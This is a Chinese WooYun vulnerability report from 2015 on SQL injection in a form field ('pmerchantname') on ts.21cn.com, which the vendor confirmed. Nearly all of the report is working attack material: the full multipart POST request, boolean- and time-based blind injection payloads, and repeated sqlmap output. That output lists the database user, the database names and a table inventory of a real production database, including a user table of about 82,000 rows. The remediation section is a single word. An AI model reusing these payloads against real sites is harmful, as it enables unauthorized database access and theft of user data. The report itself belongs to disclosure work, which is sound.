当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127189

漏洞标题:世纪龙某处表单存在SQL注射漏洞

相关厂商:世纪龙信息网络有限责任公司

漏洞作者: 路人甲

提交时间:2015-07-16 15:47

修复时间:2015-08-30 22:54

公开时间:2015-08-30 22:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-16: 细节已通知厂商并且等待厂商处理中
2015-07-16: 厂商已经确认,细节仅向厂商公开
2015-07-26: 细节向核心白帽子及相关领域专家公开
2015-08-05: 细节向普通白帽子公开
2015-08-15: 细节向实习白帽子公开
2015-08-30: 细节向公众公开

简要描述:

详细说明:

POST /home/preview HTTP/1.1
Content-Length: 946
Content-Type: multipart/form-data; boundary=-----wooyunBoundary_DTQUTVUHKJ
X-Requested-With: XMLHttpRequest
Referer: http://ts.21cn.com/
Cookie: PHPSESSID=06f83672ea38aac0b7e54abeb038a20f; JSESSIONID=aaa9wVJf_6Gee7WcYBv6u
Host: ts.21cn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=-----wooyunBoundary_LFUYYLIYJS
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--

漏洞证明:

sqlmap identified the following injection points with a total of 126 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
current user: None
current user is DBA: False
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
current user: '[email protected]'
current user is DBA: False
available databases [3]:
[*] information_schema
[*] jutousu
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
Database: jutousu
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| iic_user | 82710 |
| iic_reply | 54781 |
| iic_log | 49619 |
| iic_digg | 46570 |
| iic_post_sync | 18118 |
| iic_user_addres | 17637 |
| iic_post | 15565 |
| iic_digg_20131224 | 13041 |
| iic_post_com | 12930 |
| iic_reply_sync | 6894 |
| iic_area | 3407 |
| iic_collective_digg | 2153 |
| iic_case | 941 |
| iic_access | 936 |
| iic_com | 764 |
| iic_wxuser | 750 |
| iic_recom | 731 |
| iic_collective_reply | 672 |
| iic_post_dealwith_satisfaction | 640 |
| iic_captcha | 531 |
| iic_merchant | 472 |
| iic_node | 278 |
| iic_movice | 188 |
| iic_redblackdigg | 100 |
| iic_ipadmin | 99 |
| iic_feedback | 95 |
| iic_collective | 93 |
| iic_postkeyword | 93 |
| iic_cat | 61 |
| iic_reply_link | 60 |
| iic_collectivetimeline | 59 |
| iic_collectivenews | 43 |
| iic_hotpost | 42 |
| iic_team | 42 |
| iic_article | 40 |
| iic_role_account | 36 |
| iic_account | 30 |
| iic_specialcolumn | 27 |
| iic_collectiveslide | 26 |
| iic_proc | 26 |
| iic_redblacklist | 25 |
| iic_keyword | 12 |
| iic_collectiveweibo | 11 |
| iic_admin | 8 |
| iic_role | 6 |
| iic_ip | 4 |
| iic_experttype | 3 |
| iic_arc | 2 |
| iic_wbsync | 2 |
| iic_filter | 1 |
+--------------------------------+---------+

修复方案:

修复

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-16 22:53

厂商回复:

感谢您对我们业务安全的关注,根据您的报告,问题已着手处理,谢谢

最新状态:

暂无